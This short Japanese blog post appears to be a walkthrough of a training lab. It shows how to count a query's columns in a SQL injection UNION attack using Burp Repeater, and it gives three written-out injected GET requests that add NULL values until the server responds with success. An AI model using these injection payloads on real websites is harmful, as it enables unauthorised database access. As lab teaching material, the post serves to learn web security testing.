Hello there, ('ω')ノ
SQLインジェクションのUNION攻撃で、クエリで返される列の数を。
クエリの結果は、アプリケーションの応答で返されるので。
クエリで返される列の数がわかって。
そのためには、UNIONでnull値を追加していって。
まずは、Petsカテゴリを選択して。
インターセプトしてリピータへ。
まずは、そのままSendして。
GETメソッドなので、クエリを+で結合して追加して、Sendして。
GET /filter?category=Pets'+UNION+SELECT+NULL--
もう一つ、NULLを追加してレスポンスのステータスを確認して。
GET /filter?category=Pets'+UNION+SELECT+NULL,NULL--
もう一つ、NULLを追加してSendすると成功のレスポンスが。
GET /filter?category=Pets'+UNION+SELECT+NULL,NULL,NULL--
クリアできた。
Best regards, (^^ゞ